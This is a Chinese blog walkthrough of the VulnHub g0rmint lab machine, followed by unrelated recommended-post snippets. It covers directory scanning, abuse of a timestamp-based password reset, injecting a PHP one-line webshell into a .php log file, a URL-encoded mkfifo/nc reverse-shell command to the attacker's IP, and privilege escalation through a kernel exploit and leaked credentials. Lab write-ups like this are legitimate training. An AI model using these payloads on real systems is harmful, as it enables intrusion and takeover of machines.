kali渗透综合靶机(十四)--g0rmint靶机_W小哥1的博客-程序员宅基地

技术标签： # kali综合渗透测试

一、靶机下载

下载链接：https://www.vulnhub.com/entry/g0rmint-1,214/

二、g0rmint靶机搭建

将下载好的靶机环境，用VMware导入即可使用，文件->打开
在这里插入图片描述

导入到合适位置即可，默认是C盘，成功导入虚拟机之后，打开即可

三、攻击过程

kali IP：192.168.212.6
靶机IP：192.168.212.10

1、主机发现

在这里插入图片描述

2、端口扫描

方法一：
在这里插入图片描述
方法二：

3、端口服务识别

在这里插入图片描述

4、漏洞查找与利用

访问网站
在这里插入图片描述
扫描目录

发现

访问

查看页面源码,发现备份目录

使用dirb 扫描http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/,发现http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/info.php

访问http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/info.php
在这里插入图片描述
下载备份文件

查看网站代码,发现用户名、密码、邮箱,尝试登录失败

查看login.php,发现登录失败的时候会生成一个日志文件(调用addlog函数)

查看addlog函数,发现日志写在.php文件中,尝试在登录邮箱处插入php语句,从而任意执行代码
在这里插入图片描述
在登录邮箱处插入php一句话木马,点击提交,登录失败跳转到登录页面
最后发现是fwrite($fh, file_get_contents(“dummy.php”) . “
\n”);写入了一个session判断

所以需要先解决登录的问题。
查看reset.php,可以看到只要知道了一个存在的邮箱和用户名,就可以重置密码为一个时间值的哈希,尝试了demo和一些常用邮箱用户名之后，发现似乎并没有这个用户
在这里插入图片描述
在全文搜索email关键字, 可以在一个css文件中看到用户的名字和邮箱

成功重置后,界面右下角也给出了对应的时间，遂能算出相应的哈希值,使用在线的hash加密，去加密成功后的hash值前20位最为密码的值

在这里插入图片描述

重置密码

访问到生成的log文件，因在代码审计中发现登录失败日志路径

访问http://192.168.212.10/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-03-29.php
（由于时间戳原因，日期需提前一天）

在登陆的时候邮箱处插入一句话木马，然后访问对应日志，提交POST参数即可执行任意PHP代码。
在这里插入图片描述

然后将shell反弹到我的kali中来
在post中输入:注意需要url编码
cmd=%60rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%20192.168.212.6%201234%20%3E%2Ftmp%2Ff%3B%60%3B

kali监听

提权方式一

查看内核版本
在这里插入图片描述
kali查看是否有对应版本的漏洞

在kali编译好脚本,然后目标用wget下载,执行,获得管理员权限

提权方式二

在1的基础上
在/var/www目录下又发现网站备份文件,解压发现db.sql
在这里插入图片描述

查看db.sql发现用户noman以及密码

密码解压

用户名/密码：noman/tayyab123
尝试用noman用户登录,失败,发现/etc/passwd中有g0rmint，尝试用noman的密码登录,成功登录进去

用sudo -l 查看当前用户是否属于sudo组,然后sudo -i 直接获得管理员权限
在这里插入图片描述

总结

1、信息收集、端口扫描、服务识别
2、目录扫描、发现敏感信息备份文件
3、登录密码的地方暂时突破不了,尝试在重置密码的地方寻找突破口、发现有用信息
4、进行代码审计,发现日志文件的后缀是php文件,这时可以尝试在登录的地方接入一句话,然后就写入到日志中。
5、getshell、提权

更多web安全工具与存在漏洞的网站搭建源码，收集整理在知识星球。
在这里插入图片描述

本文链接：https://blog.csdn.net/weixin_40412037/article/details/105182806

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

[emqttd] （EMQ）_普通网友的博客-程序员宅基地

[emqttd] （EMQ）是采用Erlang语言开发，全面支持MQTT V3.1.1协议，支持集群和大规模连接的开源MQTT消息服务器。 [emqttd]致力于发布一个基于Erlang/OTP语言平台，企业级稳定可靠，完全开源免费，可集群支持大规模物联网、移动互联网连接的MQTT消息服务器。 # 完整的MQTT V3.1/V3.1.1协议支持* 全面支持MQTT V3.1/V3.1.1协议...

HDFS 分布式文件系统原理讲解之漫画_小小白@的博客-程序员宅基地

HDFS 写流程

Spring Boot学习笔记22——安全管理（用户授权）_小盆友家的条条的博客-程序员宅基地

当一个系统建立后，通常都有一些权限控制，使得不同的角色有不同的权限操作，下面就针对web应用中常用的自定义用户授权进行介绍1. 自定义用户访问控制在实际的开发中，网站访问多是基于HTTP请求的，在前一个学习笔记中，我们已经讨论过重写WenSecurityConfigurerAdapter类的configure(HttpSecurity http)方法可以对基于HTTP的请求访问进行控制。下面问通过对configure(HttpSecurity)方法的讲解，分析自定义用户访问控制的实现流程co.

5v 3.3v电平转换电路_【Monster学电子】19种5V转3.3V电路集锦！_weixin_39656435的博客-程序员宅基地

添加小编微信：Monster5750，进技术交流群。一：使用LDO稳压器，从5V电源向3.3V系统供电标准三端线性稳压器的压差通常是 2.0-3.0V。要把 5V 可靠地转换为 3.3V，就不能使用它们。压差为几百个毫伏的低压降 (Low Dropout， LDO)稳压器，是此类应用的理想选择。图 1-1 是基本LDO 系统的框图，标注了相应的电流。从图中可以看出， LD...

【过期技能】Django1.5+xadmin 显示问题，无法添加inline_M-斯佧的博客-程序员宅基地

添加了inline，inline如下所示，应该只有一条却多余显示无用的条框，且加号按钮无用，无法创建和保存解决方案：django-crispy-forms版本问题pip list查看安装的django-crispy-forms版本是多少，当时环境为django-crispy-forms == 1.5.2删除原版本pip uninstall django-crispy-f

Qt 利用XML文档，写一个程序集合三_DreamLife.的博客-程序员宅基地

接上一篇https://blog.csdn.net/z609932088/article/details/80774950滚动区域实现，滚动区域可以三成分层第一层，显示内容中间层，滚动层第三层，爸爸层把我们要显示的内容添加在第一层，通过使用setWidget来把第一城放到第二层中新建滚动区域的时候的爸爸，就是第三城上代码QScrollArea *scrollArea = new QScrollAr...